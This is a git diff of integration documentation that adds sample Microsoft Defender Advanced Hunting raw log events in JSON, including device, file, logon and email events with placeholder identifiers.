"InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCreationTime": "2022-09-01T06:56:23.7887846Z", + "InitiatingProcessId": 1664, + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessParentCreationTime": "2022-09-01T06:56:23.595229Z", + "InitiatingProcessParentId": 15532, + "InitiatingProcessParentFileName": "software_reporter_tool.exe", + "DeviceId": "1111111111111111111111111111111111111111", + "AppGuardContainerId": "", + "MachineGroup": "UnassignedGroup", + "Timestamp": "2022-09-01T07:09:47.4980566Z", + "DeviceName": "test.lab", + "ReportId": 104061 + } + } + ``` + + + +=== "test_device_event_sensitive_file_read" + + + ```json + { + "time": "2024-11-12T10:18:48.4363168Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-11-12T10:18:28.1484017Z", + "properties": { + "DeviceId": "abcdef0123456789", + "DeviceName": "user.company.local", + "ReportId": 73291, + "InitiatingProcessId": 1328, + "InitiatingProcessCreationTime": "2024-11-12T10:17:23.9905327Z", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessParentFileName": "Windows.exe", + "InitiatingProcessParentId": 1820, + "InitiatingProcessParentCreationTime": "2024-10-14T05:47:54.3243814Z", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "browser.exe", + "InitiatingProcessFolderPath": "c:\\program files (x86)\\browser.exe", + "InitiatingProcessAccountName": "username", + "InitiatingProcessAccountDomain": "company", + "SHA1": null, + "MD5": null, + "FileName": "FileName.mdb", + "FolderPath": "C:\\Log", + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": null, + "InitiatingProcessAccountSid": "S-1-2-3", + "AppGuardContainerId": "", + "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "SHA256": null, + "RemoteUrl": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "ActionType": "SensitiveFileRead", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 5223047, + "AccountSid": "S-1-2-3", + "RemoteDeviceName": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": "USERNAME@COMPANY.COM", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "FileSize": 286720, + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessSessionId": 1, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:17:24.8588296Z", + "MachineGroup": "PC" + }, + "Tenant": "DefaultTenant" + } + ``` + + + +=== "test_device_events_2" ```json @@ -831,99 +1105,250 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_detection_source" +=== "test_device_events_get_clipboard_data" ```json { - "time": "2022-09-02T22:06:00.6652718Z", - "tenantId": "16ed4fbf-027f-47b3-8d1a-a342781dd2d2", + "time": "2024-11-12T09:49:58.3460812Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "operationName": "Publish", - "category": "AdvancedHunting-AlertInfo", + "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-11-12T09:49:02.3098089Z", "properties": { - "AlertId": "da637977531594995313_968283104", - "Timestamp": "2022-09-02T22:04:16.134644Z", - "Title": "'Lodi' unwanted software was prevented", - "ServiceSource": "Microsoft Defender for Endpoint", - "Category": "DefenseEvasion", - "Severity": "Informational", - "DetectionSource": "Antivirus", - "MachineGroup": "Windows 10 - remediate threats automatically", - "AttackTechniques": "" - } + "DeviceId": "abcdef0123456789", + "DeviceName": "device.company.fr", + "ReportId": 157950, + "InitiatingProcessId": 12824, + "InitiatingProcessCreationTime": "2024-11-12T10:09:31.1004556Z", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessParentFileName": "exec.exe", + "InitiatingProcessParentId": 18840, + "InitiatingProcessParentCreationTime": "2024-11-12T08:44:15.1503958Z", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "outlook.exe", + "InitiatingProcessFolderPath": "c:\\program files\\microsoft office\\root\\outlook.exe", + "InitiatingProcessAccountName": "john.doe", + "InitiatingProcessAccountDomain": "account-domain", + "SHA1": null, + "MD5": null, + "FileName": null, + "FolderPath": null, + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": null, + "InitiatingProcessAccountSid": "S-1-2-3", + "AppGuardContainerId": "", + "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "SHA256": null, + "RemoteUrl": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "ActionType": "GetClipboardData", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 389220681, + "AccountSid": null, + "RemoteDeviceName": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": "john.doe@account-domain.fr", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "FileSize": null, + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessSessionId": 12, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:19:26.5027772Z", + "MachineGroup": "All_Win10_11" + }, + "Tenant": "DefaultTenant" } ``` -=== "test_device_event" +=== "test_device_events_powershell_command" ```json { - "time": "2022-09-01T07:28:59.5127177Z", - "tenantId": "5ac3ff49-0e19-4600-9ad1-333e64e3b5cc", + "time": "2024-11-12T10:18:46.3194193Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "operationName": "Publish", "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-11-12T10:17:19.1406475Z", "properties": { - "AccountSid": null, - "AccountDomain": null, - "AccountName": null, - "LogonId": null, + "DeviceId": "abcdef0123456789", + "DeviceName": "device.name.fr", + "ReportId": 134294, + "InitiatingProcessId": 27568, + "InitiatingProcessCreationTime": "2024-11-12T10:15:16.4871111Z", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessParentFileName": "WindowsTerminal.exe", + "InitiatingProcessParentId": 884, + "InitiatingProcessParentCreationTime": "2024-11-12T09:20:42.8246765Z", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "powershell.exe", + "InitiatingProcessFolderPath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "InitiatingProcessAccountName": "jdoe", + "InitiatingProcessAccountDomain": "domain", + "SHA1": null, + "MD5": null, "FileName": null, "FolderPath": null, - "MD5": null, - "SHA1": null, - "FileSize": null, + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": "{\"Command\":\"nslookup.exe user01-domain.USER01.local 1.2.3.4\"}", + "InitiatingProcessAccountSid": "S-1-2-3", + "AppGuardContainerId": "", + "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", "SHA256": null, + "RemoteUrl": null, "ProcessCreationTime": null, "ProcessTokenElevation": null, - "RemoteUrl": null, + "ActionType": "PowerShellCommand", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 398124703, + "AccountSid": null, + "RemoteDeviceName": null, "RegistryKey": null, "RegistryValueName": null, "RegistryValueData": null, - "RemoteDeviceName": null, - "FileOriginIP": null, - "FileOriginUrl": null, - "LocalIP": "1.2.3.4", + "LogonId": null, + "LocalIP": null, "LocalPort": null, - "RemoteIP": "5.6.7.8", + "RemoteIP": null, "RemotePort": null, "ProcessId": null, "ProcessCommandLine": null, - "AdditionalFields": "{\"BaseAddress\":2098738167808,\"RegionSize\":262144,\"ProtectionMask\":64}", - "ActionType": "NtAllocateVirtualMemoryApiCall", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessFolderPath": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", - "InitiatingProcessFileName": "software_reporter_tool.exe", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", - "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "InitiatingProcessAccountUpn": "JDOE@domain.fr", + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "FileSize": null, + "InitiatingProcessFileSize": 450560, + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessSessionId": 6, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:15:59.5508823Z", + "MachineGroup": "UnassignedGroup" + }, + "Tenant": "DefaultTenant" + } + ``` + + + +=== "test_device_events_shell_link_create_file" + + + ```json + { + "time": "2024-11-12T10:18:30.9849876Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-11-12T10:18:00.0874785Z", + "properties": { + "DeviceId": "abcdef0123456789", + "DeviceName": "user.company.local", + "ReportId": 22722, + "InitiatingProcessId": 20948, + "InitiatingProcessCreationTime": "2024-11-12T10:02:28.7779103Z", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessParentFileName": "explorer.exe", + "InitiatingProcessParentId": 14616, + "InitiatingProcessParentCreationTime": "2024-11-12T08:47:41.9520775Z", "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", - "InitiatingProcessLogonId": 121834210, - "InitiatingProcessAccountSid": "S-1-00-1-1111111-2222222222-3333333333-4444444444", - "InitiatingProcessAccountDomain": "intranet", - "InitiatingProcessAccountName": "group1", - "InitiatingProcessAccountUpn": "user@example.org", - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCreationTime": "2022-09-01T06:56:23.7887846Z", - "InitiatingProcessId": 1664, - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessParentCreationTime": "2022-09-01T06:56:23.595229Z", - "InitiatingProcessParentId": 15532, - "InitiatingProcessParentFileName": "software_reporter_tool.exe", - "DeviceId": "1111111111111111111111111111111111111111", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFileName": "winword.exe", + "InitiatingProcessFolderPath": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "InitiatingProcessAccountName": "jdoe", + "InitiatingProcessAccountDomain": "company", + "SHA1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "MD5": "5d5608654828cf052ba013b3c37cbb61", + "FileName": "FILENAME.LNK", + "FolderPath": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": "{\"FileSizeInBytes\":914,\"VolumeGuidPath\":\"\\\\\\\\?\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\",\"IsOnRemovableMedia\":false,\"ShellLinkRunAsAdmin\":false,\"ShellLinkShowCommand\":\"SW_SHOWNORMAL\"}", + "InitiatingProcessAccountSid": "S-1-2-3", "AppGuardContainerId": "", - "MachineGroup": "UnassignedGroup", - "Timestamp": "2022-09-01T07:09:47.4980566Z", - "DeviceName": "test.lab", - "ReportId": 104061 - } + "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "SHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "RemoteUrl": null, + "ProcessCreationTime": "2024-11-06T16:05:23.1138023Z", + "ProcessTokenElevation": null, + "ActionType": "ShellLinkCreateFileEvent", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": 8066492, + "AccountSid": null, + "RemoteDeviceName": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": "JOHNDOE@COMPANY.COM", + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "FileSize": null, + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessSessionId": 1, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-11-12T10:17:23.3307226Z", + "MachineGroup": "UnassignedGroup" + }, + "Tenant": "DefaultTenant" } ``` @@ -1034,6 +1459,82 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_device_file_event_02" + + + ```json + { + "time": "2024-11-08T14:42:24.2882642Z", + "tenantId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceFileEvents", + "_TimeReceivedBySvc": "2024-11-08T14:41:06.9726687Z", + "properties": { + "SHA1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "FileSize": 640920, + "MD5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "FileName": "FileName.dll", + "FolderPath": "C:\\Program Files\\FileName.dll", + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileName": "commandexec.exe", + "InitiatingProcessParentFileName": "services.exe", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessFolderPath": "c:\\windows\\system32\\commandexec.exe", + "InitiatingProcessParentCreationTime": "2024-10-09T01:02:27.2227081Z", + "InitiatingProcessId": 16468, + "DeviceName": "device.company.local", + "DeviceId": "123456789abcdef", + "InitiatingProcessCreationTime": "2024-11-08T14:38:23.2383083Z", + "InitiatingProcessAccountName": "syst\u00e8me", + "InitiatingProcessAccountDomain": "account domain", + "InitiatingProcessAccountSid": "S-1-2-3", + "InitiatingProcessParentId": 888, + "ReportId": 341972, + "SHA256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "FileOriginUrl": null, + "FileOriginIP": null, + "FileOriginReferrerUrl": null, + "AppGuardContainerId": "", + "ActionType": "FileCreated", + "SensitivityLabel": null, + "SensitivitySubLabel": null, + "IsAzureInfoProtectionApplied": null, + "RequestProtocol": "Local", + "ShareName": null, + "RequestSourceIP": null, + "RequestSourcePort": null, + "RequestAccountName": "Syst\u00e8me", + "RequestAccountDomain": "ACCOUNT DOMAIN", + "RequestAccountSid": "S-1-2-3", + "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "InitiatingProcessAccountUpn": null, + "InitiatingProcessAccountObjectId": null, + "AdditionalFields": "{\"FileType\":\"PortableExecutable\"}", + "PreviousFolderPath": "", + "PreviousFileName": "", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessSessionId": 0, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "Timestamp": "2024-11-08T14:38:51.9048761Z", + "MachineGroup": null + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_device_image_load_event" @@ -1238,6 +1739,73 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_device_logon_failed" + + + ```json + { + "time": "2024-11-18T10:08:29.9147832Z", + "tenantId": "12345678-abcd-ef09-1234-123456abcdef", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceLogonEvents", + "_TimeReceivedBySvc": "2024-11-18T10:07:35.3397350Z", + "properties": { + "AccountName": "account", + "AccountDomain": "domain", + "LogonType": "Network", + "DeviceName": "domain", + "DeviceId": "1111111111111111111111111111111111111111", + "ReportId": 413706, + "AccountSid": null, + "AppGuardContainerId": null, + "LogonId": null, + "RemoteIP": "1.2.3.4", + "RemotePort": null, + "RemoteDeviceName": null, + "ActionType": "LogonFailed", + "InitiatingProcessId": 3653343, + "InitiatingProcessCreationTime": "2024-11-18T10:07:20.29393Z", + "InitiatingProcessFileName": "sshd", + "InitiatingProcessFolderPath": "/usr/sbin/sshd", + "InitiatingProcessSHA1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "InitiatingProcessSHA256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessAccountName": "root", + "InitiatingProcessAccountDomain": "domain", + "InitiatingProcessAccountSid": null, + "InitiatingProcessTokenElevation": "None", + "InitiatingProcessIntegrityLevel": null, + "InitiatingProcessParentId": 3653343, + "InitiatingProcessParentCreationTime": "2024-11-18T10:07:20.29Z", + "InitiatingProcessParentFileName": "sshd", + "AdditionalFields": "{\"PosixUserId\":1301,\"PosixPrimaryGroupName\":\"account\",\"PosixPrimaryGroupId\":500,\"PosixSecondaryGroups\":\"[{\\\"Name\\\":\\\"users\\\",\\\"PosixGroupId\\\":100},{\\\"Name\\\":\\\"exploitation\\\",\\\"PosixGroupId\\\":1202}]\",\"InitiatingAccountName\":\"root\",\"InitiatingAccountDomain\":\"domain\",\"InitiatingAccountPosixUserId\":0,\"InitiatingAccountPosixGroupName\":\"mdatp\",\"InitiatingAccountPosixGroupId\":595}", + "RemoteIPType": "Private", + "IsLocalAdmin": null, + "InitiatingProcessAccountUpn": null, + "InitiatingProcessAccountObjectId": null, + "Protocol": null, + "FailureReason": null, + "InitiatingProcessFileSize": 890528, + "InitiatingProcessVersionInfoCompanyName": null, + "InitiatingProcessVersionInfoProductName": null, + "InitiatingProcessVersionInfoProductVersion": null, + "InitiatingProcessVersionInfoInternalFileName": null, + "InitiatingProcessVersionInfoOriginalFileName": null, + "InitiatingProcessVersionInfoFileDescription": null, + "InitiatingProcessSessionId": null, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "Timestamp": "2024-11-18T10:07:22.681617Z", + "MachineGroup": "Linux Servers - remediate threats automatically" + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_device_network_connection" @@ -1809,6 +2377,116 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_email_delivered" + + + ```json + { + "time": "2024-10-28T14:31:34.1371671Z", + "tenantId": "12345678-abcd-ef09-1234-123456abcdef", + "operationName": "Publish", + "category": "AdvancedHunting-EmailEvents", + "_TimeReceivedBySvc": "2024-10-28T14:18:40.3469550Z", + "properties": { + "ReportId": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c", + "NetworkMessageId": "12345678-1234-abcd-ef90-abcdef123456", + "InternetMessageId": "<1@eu-west-1.test.com>", + "Timestamp": "2024-10-28T14:18:40Z", + "EmailClusterId": 3162398878, + "SenderIPv4": "1.2.3.4", + "SenderIPv6": null, + "SenderMailFromAddress": "john.doe@company.com", + "SenderFromAddress": "john.doe@company.com", + "SenderMailFromDomain": "company.com", + "SenderFromDomain": "company.com", + "RecipientEmailAddress": "alan.smithee@company.com", + "Subject": "MAIL subject", + "EmailDirection": "Inbound", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailAction": null, + "EmailActionPolicy": null, + "EmailActionPolicyGuid": null, + "AttachmentCount": 0, + "UrlCount": 0, + "EmailLanguage": "en", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderObjectId": null, + "SenderDisplayName": null, + "ThreatNames": null, + "ThreatTypes": null, + "DetectionMethods": null, + "Connectors": "Relai SMTP interne", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "UserLevelAction": null, + "UserLevelPolicy": null, + "ConfidenceLevel": null, + "AdditionalFields": null, + "AuthenticationDetails": "{\"SPF\":\"pass\",\"DKIM\":\"none\",\"DMARC\":\"pass\"}", + "BulkComplaintLevel": null + }, + "Tenant": "DefaultTenant" + } + ``` + + + +=== "test_email_delivered2" + + + ```json + { + "time": "2024-10-28T14:39:28.9769628Z", + "tenantId": "12345678-abcd-ef09-1234-123456abcdef", + "operationName": "Publish", + "category": "AdvancedHunting-EmailEvents", + "_TimeReceivedBySvc": "2024-10-28T14:18:38.5006358Z", + "properties": { + "ReportId": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c", + "NetworkMessageId": "12345678-1234-abcd-ef90-abcdef123456", + "InternetMessageId": "<20241028141819.43623347A8F@test.fr>", + "Timestamp": "2024-10-28T14:18:38Z", + "EmailClusterId": 2633942188, + "SenderIPv4": "1.2.3.4", + "SenderIPv6": null, + "SenderMailFromAddress": "john.doe@test.fr", + "SenderFromAddress": "john.doe@test.fr", + "SenderMailFromDomain": "test.fr", + "SenderFromDomain": "test.fr", + "RecipientEmailAddress": "alan.smithee@test.fr", + "Subject": "EMAIL Subject", + "EmailDirection": "Inbound", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailAction": null, + "EmailActionPolicy": null, + "EmailActionPolicyGuid": null, + "AttachmentCount": 0, + "UrlCount": 0, + "EmailLanguage": "en", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderObjectId": null, + "SenderDisplayName": null, + "ThreatNames": null, + "ThreatTypes": null, + "DetectionMethods": null, + "Connectors": "Relai SMTP interne", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "UserLevelAction": null, + "UserLevelPolicy": null, + "ConfidenceLevel": null, + "AdditionalFields": null, + "AuthenticationDetails": "{\"SPF\":\"pass\",\"DKIM\":\"none\",\"DMARC\":\"pass\"}", + "BulkComplaintLevel": null + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_email_events" @@ -1902,7 +2580,7 @@ In this section, you will find examples of raw logs as generated natively by the "Action": "Moved to quarantine", "DeliveryLocation": "Quarantine", "ActionTrigger": "SpecialAction", - "InternetMessageId": "<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>", + "InternetMessageId": "<1@eu-west-1.amazonses.com>", "ThreatTypes": "Spam", "DetectionMethods": "{\"Spam\":[\"Fingerprint matching\"]}" }, @@ -2185,7 +2863,7 @@ In this section, you will find examples of raw logs as generated natively by the "Phone": null, "CreatedDateTime": "2024-07-20T02:45:30Z", "DistinguishedName": "CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local", - "OnPremSid": "S-1-5-21-2308620423-2764619233-3639949770-5127445", + "OnPremSid": "S-1", "CloudSid": "S-1", "IsAccountEnabled": true, "SourceProvider": "AzureActiveDirectory", diff --git a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md index 4f19add9e..1ed988a5e 100644 --- 